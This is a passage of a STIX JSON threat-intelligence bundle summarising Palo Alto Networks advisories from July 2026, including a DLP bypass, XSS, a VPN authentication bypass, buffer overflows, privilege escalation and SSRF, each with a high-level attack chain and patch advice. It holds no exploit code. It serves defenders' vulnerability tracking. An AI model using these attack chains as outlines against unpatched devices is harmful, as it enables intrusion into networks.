        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://security.paloaltonetworks.com/CVE-2026-0281"
        }
      ],
      "confidence": 40
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a9681d98-ae90-5e5c-bf00-66951ea5311f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3c2a5446-10ec-5692-a678-e5b2d27c7fcd",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3c2a5446-10ec-5692-a678-e5b2d27c7fcd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-0278 Prisma Access Agent: Multiple DLP Policy Bypass Vulnerabilities on Windows",
      "description": "## Overview\n\nPalo Alto Networks has disclosed CVE-2026-0278, a medium-severity vulnerability impacting the Prisma Access Agent's Data Loss Prevention (DLP) component on Windows. This flaw stems from \"multiple protection mechanism failures\" that permit a local user with low privileges to circumvent DLP policy enforcement. This means sensitive data intended to be protected by DLP could be copied, moved, or exfiltrated without detection or prevention. The vulnerability affects all versions of Prisma Access Agent for Windows prior to 26.2.1. The macOS version of the agent is not affected. The issue was discovered and reported externally by Daniel Cuthbert and Vladislav Ovitchinikov from Banco Santander. Palo Alto Networks is currently unaware of any malicious exploitation of this vulnerability in the wild.\n\n## Attack Chain\n\n1. A Windows endpoint is running a vulnerable version of the Palo Alto Networks Prisma Access Agent (specifically, any version below 26.2.1) with Data Loss Prevention (DLP) policies configured.\n2. A local user with low privileges attempts to perform an operation, such as copying a sensitive file to an external drive or an unauthorized network share, that should normally be restricted by the configured DLP policies.\n3. The Prisma Access Agent's DLP component is engaged to inspect and enforce the policy on the user's attempted action.\n4. Due to \"multiple protection mechanism failures\" (CVE-2026-0278) inherent in the agent's DLP component, the mechanism designed to prevent the restricted action fails to function correctly.\n5. The DLP policy enforcement is bypassed, allowing the local user's restricted operation (e.g., data transfer) to complete successfully despite the policy.\n6. Sensitive data that DLP was intended to protect is consequently exposed, copied, or exfiltrated by the local user, circumventing the organization's security controls.\n\n## Impact\n\nThe primary impact of CVE-2026-0278 is the potential for unauthorized data exfiltration or misuse of sensitive information by local users on affected Windows endpoints. Organizations relying on Prisma Access Agent's DLP capabilities to prevent accidental or malicious data loss will find their controls bypassed. While Palo Alto Networks has not observed in-the-wild exploitation, a successful bypass could lead to significant data breaches, regulatory compliance failures, and reputational damage, particularly in sectors handling highly confidential data. The vulnerability impacts all Windows machines running Prisma Access Agent versions below 26.2.1.\n\n## Recommendation\n\n* Upgrade all Prisma Access Agent installations on Windows to version 26.2.1 or later immediately to remediate CVE-2026-0278.\n",
      "published": "2026-07-08T16:09:55Z",
      "labels": [
        "cve",
        "vulnerability",
        "dlp",
        "bypass",
        "windows",
        "defense-evasion"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://security.paloaltonetworks.com/CVE-2026-0278"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cb7cd8b3-fd54-5375-8847-78dd2d2673d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--65a7945a-39af-52f7-a084-835a464d6ea5",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter: JavaScript",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3a9c65d9-2d40-53f1-b82c-1b941abed117",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--65a7945a-39af-52f7-a084-835a464d6ea5",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--65a7945a-39af-52f7-a084-835a464d6ea5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-0279 PAN-OS: Multiple Cross-Site Scripting (XSS) Vulnerabilities",
      "description": "## Overview\n\nPalo Alto Networks has released an advisory concerning CVE-2026-0279, which identifies multiple low-severity cross-site scripting (XSS) vulnerabilities across various components of its PAN-OS software. These vulnerabilities specifically affect the User-ID™ Authentication Portal (also known as Captive Portal), GlobalProtect™ gateway/portal features, and Clientless VPN. An unauthenticated attacker could exploit these flaws to inject and store malicious JavaScript payloads, which would then execute in the context of a legitimate user's browser when they access the vulnerable component. The risk associated with this issue is significantly reduced by adhering to Palo Alto Networks' recommended best practices, which include restricting access to management interfaces and the User-ID Authentication Portal to only trusted internal IP addresses. Cloud NGFW products are not affected. Affected versions include PAN-OS 12.1 prior to 12.1.8, 11.2 prior to 11.2.13, 11.1 prior to 11.1.16, and all 10.2 versions, along with specific Prisma Access versions. No active exploitation has been reported.\n\n## Attack Chain\n\n1. **Vulnerability Identification**: An unauthenticated attacker identifies a vulnerable input field or parameter within the User-ID Authentication Portal, GlobalProtect gateway/portal, or Clientless VPN of an exposed PAN-OS device.\n2. **Payload Crafting**: The attacker constructs a malicious JavaScript payload designed to achieve an objective such as session hijacking, credential theft, or redirection to a malicious website.\n3. **Payload Injection**: The crafted JavaScript payload is injected by the attacker into the identified vulnerable component through an unauthenticated network request.\n4. **Persistent Storage**: The PAN-OS application processes and stores the malicious payload, embedding it within the user-facing content of the vulnerable component.\n5. **Victim Interaction**: A legitimate user accesses the compromised PAN-OS component (e.g., logs into the User-ID Authentication Portal or uses a GlobalProtect feature).\n6. **Client-Side Execution**: The injected malicious JavaScript is rendered and executed by the victim's web browser as part of the legitimate PAN-OS application interface.\n7. **Malicious Action**: The executed JavaScript performs its intended action, potentially leading to unauthorized access to the victim's session, exposure of sensitive information, or further client-side attacks.\n\n## Impact\n\nThe vulnerabilities, categorized as low severity, primarily impact the confidentiality and integrity of users interacting with the affected PAN-OS portals and features. While no active exploitation has been reported, successful exploitation could lead to client-side attacks where an attacker executes malicious JavaScript within a victim's browser. This could result in session hijacking, allowing unauthorized access to the victim's user session, or credential theft if the script is designed to capture login information. The overall product confidentiality and integrity are rated as LOW, and availability is rated as NONE, indicating that the vulnerability does not directly compromise the firewall's core functions or lead to denial of service. The impact is minimized when the management interfaces and portal access are restricted to trusted internal networks, as per best practices.\n\n## Recommendation\n\n* Patch CVE-2026-0279 immediately by upgrading all affected PAN-OS devices and Prisma Access deployments to the specified fixed versions: PAN-OS 12.1.8 or later, PAN-OS 11.2.13 or later, PAN-OS 11.1.16 or later, or a supported fixed version for PAN-OS 10.2. Prisma Access 11.2 should be upgraded to 11.2.7-h18 or later, and Prisma Access 10.2 to 10.2.10-h39 or later.\n* Implement network access restrictions to the management interface and User-ID Authentication Portal according to Palo Alto Networks' best practice deployment guidelines, ensuring access is limited to only trusted internal IP addresses.\n",
      "published": "2026-07-08T16:10:47Z",
      "labels": [
        "xss",
        "vulnerability",
        "firewall",
        "network-device",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://security.paloaltonetworks.com/CVE-2026-0279"
        }
      ],
      "confidence": 40
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--43a593ee-c3e4-526a-9108-70ea891f788f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fa8e1db0-bf55-51f3-8b97-45896d6fb2f6",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fa8e1db0-bf55-51f3-8b97-45896d6fb2f6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-0283: Authentication Bypass in Palo Alto Networks PAN-OS Large Scale VPN (LSVPN)",
      "description": "## Overview\n\nPalo Alto Networks has disclosed CVE-2026-0283, an authentication bypass vulnerability affecting specific versions of PAN-OS software when configured with Large Scale VPN (LSVPN) and active satellites. Discovered internally, this vulnerability allows an attacker with network access to bypass security restrictions and establish an unauthorized site-to-site VPN connection without prior authentication. The flaw impacts PAN-OS 10.2, 11.1, 11.2, and 12.1, but does not affect Panorama, Cloud NGFW, or Prisma Access. Exploitation requires the firewall to have LSVPN satellites explicitly configured. While currently unreported as being actively exploited in the wild, the vulnerability could grant unauthorized access to sensitive internal networks, making it a significant concern for organizations relying on these PAN-OS deployments.\n\n## Attack Chain\n\n1. Attacker identifies a vulnerable Palo Alto Networks PAN-OS firewall with LSVPN enabled and publicly accessible via the network.\n2. Attacker initiates a connection attempt to the vulnerable LSVPN endpoint on the firewall.\n3. Attacker sends a specially crafted network request designed to exploit the authentication bypass vulnerability, CVE-2026-0283.\n4. The vulnerable PAN-OS software incorrectly processes the request, failing to enforce proper authentication due to the flaw.\n5. Attacker successfully establishes an unauthorized site-to-site VPN tunnel, gaining network-level access through the compromised firewall.\n6. The attacker can then perform internal network reconnaissance, attempt lateral movement, or potentially exfiltrate sensitive data from the connected network segment.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-0283 leads to an unauthorized site-to-site VPN connection, granting attackers direct access to the internal network resources protected by the vulnerable firewall. This unauthorized access can result in severe confidentiality breaches, as attackers may gain the ability to view, modify, or exfiltrate sensitive data. While the vulnerability itself does not directly impact the integrity or availability of the firewall, the subsequent access to the internal network can lead to further compromises, service disruption, and potential data loss, depending on the attacker's objectives and the network's configuration.\n\n## Recommendation\n\n* Immediately upgrade affected Palo Alto Networks PAN-OS firewalls to the fixed versions for CVE-2026-0283, specifically: PAN-OS 12.1.4-h8 or later, 12.1.7-h2 or later, 12.1.8 or later; PAN-OS 11.2.4-h20 or later, 11.2.7-h18 or later, 11.2.10-h12 or later, 11.2.13 or later; PAN-OS 11.1.4-h35 or later, 11.1.6-h35 or later, 11.1.7-h8 or later, 11.1.10-h30 or later, 11.1.13-h9 or later, 11.1.16 or later; PAN-OS 10.2.7-h36 or later, 10.2.10-h39 or later, 10.2.13-h23 or later, 10.2.16-h9 or later, 10.2.18-h8 or later.\n* Verify if your firewall has LSVPN satellites configured by running `show config running | match satellite` from the PAN-OS CLI or checking `Network \u003e GlobalProtect \u003e Portals` in the web interface as mentioned in the CVE-2026-0283 advisory.\n* Deploy Threat Prevention content version 9122-10145 or later and enable Threat ID 510032, applying the vulnerability protection security profile to your GlobalProtect interface for limited coverage against CVE-2026-0283.\n",
      "published": "2026-07-08T16:11:35Z",
      "labels": [
        "authentication-bypass",
        "vpn",
        "network-device",
        "palo-alto-networks",
        "pan-os"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://security.paloaltonetworks.com/CVE-2026-0283"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--65c552f5-9156-532a-8568-208cb97d9c92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ca936dd1-0b01-5f3f-b52b-9ae1bfa31560",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1e3fecbf-287a-57da-8684-4162d739a80a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ca936dd1-0b01-5f3f-b52b-9ae1bfa31560",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b364d07e-5da5-514f-b1f6-9bfb2f7f2571",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ca936dd1-0b01-5f3f-b52b-9ae1bfa31560",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ca936dd1-0b01-5f3f-b52b-9ae1bfa31560",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-0288 PAN-OS: Buffer Overflow Vulnerabilities in User-ID Terminal Server Agent",
      "description": "## Overview\n\nPalo Alto Networks released an advisory regarding CVE-2026-0288, a set of multiple buffer overflow vulnerabilities present in the User-ID Terminal Server Agent (TSA) component of its PAN-OS software, Cloud NGFW, and Prisma Access products. These vulnerabilities allow an unauthenticated attacker, with direct network access to the affected device, to trigger either a denial of service (DoS) condition or, in more severe cases, execute arbitrary code. The issue primarily impacts devices where the TSA is configured and accessible from untrusted networks, emphasizing the importance of adhering to network segmentation best practices. While Palo Alto Networks is not aware of any in-the-wild exploitation, the potential for service disruption or system compromise makes this a significant concern for organizations utilizing vulnerable PAN-OS versions across their security infrastructure. The advisory was published on July 8, 2026, urging immediate attention to patching and mitigation steps.\n\n## Attack Chain\n\n1. An unauthenticated attacker gains network access to a vulnerable Palo Alto Networks PAN-OS device, Cloud NGFW, or Prisma Access instance.\n2. The target device or instance has the User-ID Terminal Server Agent (TSA) component configured and exposed, potentially to untrusted networks.\n3. The attacker sends specially crafted network traffic designed to exploit memory handling flaws to the exposed TSA component.\n4. This malicious traffic specifically targets multiple buffer overflow vulnerabilities (CVE-2026-0288) within the TSA's processing functions.\n5. Successful exploitation of these vulnerabilities leads to memory corruption within the TSA process.\n6. The memory corruption causes the TSA component to crash, resulting in a denial of service (DoS) condition on the affected device or instance.\n7. In scenarios where the buffer overflows are precisely controlled, the attacker could potentially achieve arbitrary code execution, granting them control over the compromised system.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-0288 can lead to a critical denial of service (DoS) condition, rendering the affected Palo Alto Networks PAN-OS device, Cloud NGFW, or Prisma Access instance inoperable. This can disrupt network traffic processing, user identification, and overall security enforcement, leading to significant operational downtime and potential security gaps. In the worst-case scenario, the ability to execute arbitrary code could allow an attacker to gain complete control over the device, facilitating further network penetration, data exfiltration, or installation of persistent backdoors. While no specific victim numbers or targeted sectors are publicly known as of the disclosure, any organization using vulnerable Palo Alto Networks products with an exposed User-ID Terminal Server Agent is at risk.\n\n## Recommendation\n\n* Immediately patch CVE-2026-0288 by upgrading affected Palo Alto Networks PAN-OS installations to the recommended versions:\n * PAN-OS 12.1: Upgrade to 12.1.4-h8, 12.1.7-h2, 12.1.8 or later.\n * PAN-OS 11.2: Upgrade to 11.2.4-h20, 11.2.7-h18, 11.2.10-h12, 11.2.13 or later.\n * PAN-OS 11.1: Upgrade to 11.1.4-h35, 11.1.6-h35, 11.1.7-h8, 11.1.10-h30, 11.1.13-h9, 11.1.16 or later.\n * PAN-OS 10.2: Upgrade to 10.2.7-h36, 10.2.10-h39, 10.2.13-h23, 10.2.16-h9, 10.2.18-h8 or later.\n * Prisma Access: Await scheduled maintenance or contact Palo Alto Networks Support for an on-demand upgrade if running affected versions like 11.2.0 \u003c 11.2.7-h18 or 10.2.0 \u003c 10.2.10-h39.\n* Implement the recommended mitigation for CVE-2026-0288 by restricting User-ID Terminal Server Agent (TSA) connectivity to only trusted internal IP addresses, preventing its exposure to the internet or untrusted networks.\n",
      "published": "2026-07-08T16:12:23Z",
      "labels": [
        "network",
        "vulnerability",
        "cve",
        "palo-alto-networks",
        "denial-of-service",
        "remote-code-execution"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://security.paloaltonetworks.com/CVE-2026-0288"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ff1cb713-1fd0-5a29-9a80-43738e0cc391",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b9e56263-d8d3-55ad-94b3-d6ff038249d7",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b9e56263-d8d3-55ad-94b3-d6ff038249d7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-0276: Palo Alto Networks Cortex XDR Broker VM Privilege Escalation",
      "description": "## Overview\n\nPalo Alto Networks has disclosed CVE-2026-0276, a privilege escalation vulnerability affecting Cortex XDR Broker VM versions 20.0.96 through 31.0.57. This flaw permits a locally authenticated user with low privileges to execute arbitrary commands as the root user on the Broker VM. No special configuration is required for exposure, and the attack complexity is considered low. While the vulnerability enables an attacker to achieve full control over the Broker VM, Palo Alto Networks is currently unaware of any malicious exploitation of this issue in the wild. This vulnerability is significant for defenders because compromise of a security product like Cortex XDR Broker VM could undermine an organization's detection and response capabilities, potentially allowing other malicious activities to go unnoticed.\n\n## Attack Chain\n\n1. An attacker gains initial low-privileged local access to the Cortex XDR Broker VM.\n2. The attacker identifies and exploits CVE-2026-0276, leveraging the improper privilege management within the system.\n3. Upon successful exploitation, the attacker's low-privileged session is elevated, granting them root user access on the Broker VM.\n4. With root privileges, the attacker can execute arbitrary commands, modify system configurations, or install additional malicious software directly on the Broker VM.\n5. The attacker may disable or tamper with Cortex XDR services running on the Broker VM to evade detection.\n6. The attacker maintains persistent root access to the Broker VM, potentially using it as a pivot point for further network compromise or data exfiltration.\n\n## Impact\n\nA successful exploitation of CVE-2026-0276 would allow an attacker to gain complete control over the compromised Cortex XDR Broker VM. While no malicious exploitation has been observed, such access could lead to the degradation or complete bypass of the security monitoring capabilities provided by Cortex XDR, potentially leaving an organization blind to other ongoing attacks. An attacker could also manipulate the Broker VM to exfiltrate sensitive data it processes or use it as a launchpad for lateral movement within the network. This compromise impacts the integrity and availability of the security infrastructure itself.\n\n## Recommendation\n\n* Immediately upgrade all affected Cortex XDR Broker VM instances to version 31.0.58 or later to address CVE-2026-0276.\n* Verify that automatic upgrades are enabled for Cortex XDR Broker VM as recommended by Palo Alto Networks to ensure timely receipt of security patches.\n* Regularly review access logs for the Cortex XDR Broker VM for any unusual local login attempts, especially from low-privileged accounts.\n* Implement strong authentication and access control policies for all management interfaces of the Cortex XDR Broker VM to limit potential initial low-privileged access.\n",
      "published": "2026-07-08T16:12:59Z",
      "labels": [
        "privilege-escalation",
        "vulnerability",
        "palo-alto-networks",
        "cortex-xdr"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://security.paloaltonetworks.com/CVE-2026-0276"
        }
      ],
      "confidence": 40
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a4838af5-f4e3-5b1a-a6e9-8595ccec8d04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7db5eda4-7ef9-5b2d-9a51-8c42a1703973",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1090",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1090",
          "url": "https://attack.mitre.org/techniques/T1090"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--17286bbb-8037-58b6-bc75-bca289e2e325",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7db5eda4-7ef9-5b2d-9a51-8c42a1703973",
      "target_ref": "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1592",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1592",
          "url": "https://attack.mitre.org/techniques/T1592"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--eca66126-0b13-536a-b701-e024f7b268ca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7db5eda4-7ef9-5b2d-9a51-8c42a1703973",
      "target_ref": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7db5eda4-7ef9-5b2d-9a51-8c42a1703973",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-0285 PAN-OS: Server-Side Request Forgery Vulnerability in Management Web Interface",
      "description": "## Overview\n\nPalo Alto Networks has disclosed CVE-2026-0285, a Server-Side Request Forgery (SSRF) vulnerability affecting their PAN-OS software's management web interface. This issue, internally discovered, enables an authenticated administrator with network access to the management interface to force the firewall to make unauthorized requests to internal services. While currently unreported as being maliciously exploited, the vulnerability carries a medium severity rating. Its risk is elevated if the management interface is directly exposed to the internet or untrusted networks, contrary to best practices. Versions of PAN-OS 10.2, 11.1, 11.2, and 12.1 are affected by this flaw, which could facilitate network reconnaissance or bypass internal network segmentation. Panorama, Cloud NGFW, and Prisma® Access products are not impacted.\n\n## Attack Chain\n\n1. **Initial Access**: An attacker gains authenticated access to the Palo Alto Networks PAN-OS management web interface, likely through stolen credentials (T1078) or a prior compromise.\n2. **Vulnerability Exploitation**: The authenticated administrator crafts a malicious request leveraging the SSRF vulnerability (CVE-2026-0285, CWE-918) within the PAN-OS management web interface.\n3. **Firewall-Initiated Request**: The vulnerable PAN-OS firewall is tricked into initiating an arbitrary HTTP/S request from its own network context to a target specified by the attacker.\n4. **Internal Network Access**: The firewall, acting as an unwitting proxy, makes the unauthorized request to an internal service or host that is typically not directly reachable by the attacker's client.\n5. **Information Disclosure/Service Interaction**: The firewall processes the response from the internal service and potentially relays sensitive information or the results of service interaction back to the authenticated administrator via the management interface.\n6. **Lateral Movement/Reconnaissance**: The attacker uses the disclosed information or the ability to interact with internal services to conduct further reconnaissance, identify vulnerable internal systems, or bypass network segmentation, leading to deeper network compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-0285 could enable an authenticated administrator to bypass network segmentation controls, conduct internal network reconnaissance, or interact with sensitive internal services that would otherwise be inaccessible. While no malicious exploitation has been reported, this could lead to unauthorized information disclosure from internal systems, expose vulnerable internal services, or facilitate lateral movement within an organization's network. The risk of impact is significantly higher for organizations that do not adhere to best practices by exposing their PAN-OS management interfaces to untrusted networks or the internet.\n\n## Recommendation\n\n* Immediately patch CVE-2026-0285 by upgrading all affected PAN-OS instances to the recommended fixed versions listed in the advisory, such as PAN-OS 12.1.8+, 11.2.13+, 11.1.16+, or 10.2.18-h8+.\n* Restrict management interface access to only trusted internal IP addresses, ensuring that external or untrusted networks cannot reach the PAN-OS management interface, as noted in the `Recommendation` section.\n* For customers with a Threat Prevention subscription, enable Threat ID 510030 by updating to Applications and Threats content version 9122-10145 or later and ensure SSL Decryption is enabled for inbound traffic to management services.\n* Review network configurations to confirm management interfaces are isolated and follow Palo Alto Networks' best practice deployment guidelines for securing administrative access.\n",
      "published": "2026-07-08T16:14:04Z",
      "labels": [
        "server-side-request-forgery",
        "ssrf",
        "vulnerability",
        "pan-os",
        "palo-alto-networks",
        "network-device"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7",
        "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://security.paloaltonetworks.com/CVE-2026-0285"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1d1d0a1d-2bdc-5545-bb31-c08c4e69ab4e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--262c7d07-5ab5-5f1f-ac8a-d3ddfef914c3",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--262c7d07-5ab5-5f1f-ac8a-d3ddfef914c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-0280 PAN-OS: IPv6 Firewall Policy Bypass",
